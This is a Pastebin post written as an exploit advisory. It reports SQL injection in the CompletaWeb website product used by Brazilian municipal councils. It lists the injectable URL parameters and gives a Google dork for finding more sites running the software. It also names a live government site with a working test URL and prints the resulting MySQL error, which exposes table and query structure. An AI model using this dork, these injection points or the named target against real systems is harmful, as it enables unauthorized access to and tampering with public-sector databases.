KingSkrupellos

CompletaWeb Comunicação Virtual Brazil SQL Injection

Apr 24th, 2019
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.04 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : CompletaWeb Comunicação Virtual Brazil SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/04/2019
  7. # Vendor Homepage : completa.website
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Desenvolvido por CompletaWeb Soluções Virtuais
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. CompletaWeb Comunicação Virtual Brazil is prone to an SQL-injection vulnerability because
  23.  
  24. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  25.  
  26. Exploiting this issue could allow an attacker to compromise the application, access or
  27.  
  28. modify data, or exploit latent vulnerabilities in the underlying database.
  29.  
  30. A remote attacker can send a specially crafted request to the vulnerable application and
  31.  
  32. execute arbitrary SQL commands in application`s database. Further exploitation of this
  33.  
  34. vulnerability may result in unauthorized data manipulation.
  35.  
  36. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  37.  
  38. ###################################################################
  39.  
  40. # SQL Injection Exploit :
  41. **********************
  42. /?pg=vereador&camara=&id=[SQL Injection]
  43.  
  44. /index.php?pg=noticia&id=[SQL Injection]
  45.  
  46. ###################################################################
  47.  
  48. # Example Vulnerable Sites :
  49. *************************
  50. Câmara de Vereadores de Câmara Aurora Brazil Government Municipality
  51.  
  52. [+] camaraaurora.sc.gov.br/?pg=vereador&camara=&id=55%27
  53.  
  54. ###################################################################
  55.  
  56. # Example SQL Database Error :
  57. ****************************
  58. 1064: You have an error in your SQL syntax; check the manual that corresponds
  59. to your MySQL server version for the right syntax to use near '' at line 11
  60.  
  61. SQL: SELECT DataInicio, DataFim , Descricao FROM VereadorMesaDiretora
  62. INNER JOIN CargoMesaDiretora ON CargoMesaDiretora.CodCargoMesaDiretora
  63. = VereadorMesaDiretora.CodCargoMesaDiretora INNER JOIN MesaDiretora
  64. ON MesaDiretora.CodMesaDiretora = VereadorMesaDiretora.CodMesaDiretora
  65. INNER JOIN VereadorLegislatura ON VereadorLegislatura.CodVereadorLegislatura
  66. = VereadorMesaDiretora.CodVereadorLegislatura WHERE
  67. VereadorLegislatura.CodVereador =
  68.  
  69. SQL: SELECT * FROM NoticiaFoto WHERE CodNoticia =
  70.  
  71. SQL: SELECT * FROM Noticia WHERE CodNoticia <> ORDER BY Data DESC LIMIT 3
  72.  
  73. ###################################################################
  74.  
  75. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  76.  
  77. ###################################################################
Add Comment
Please, Sign In to add comment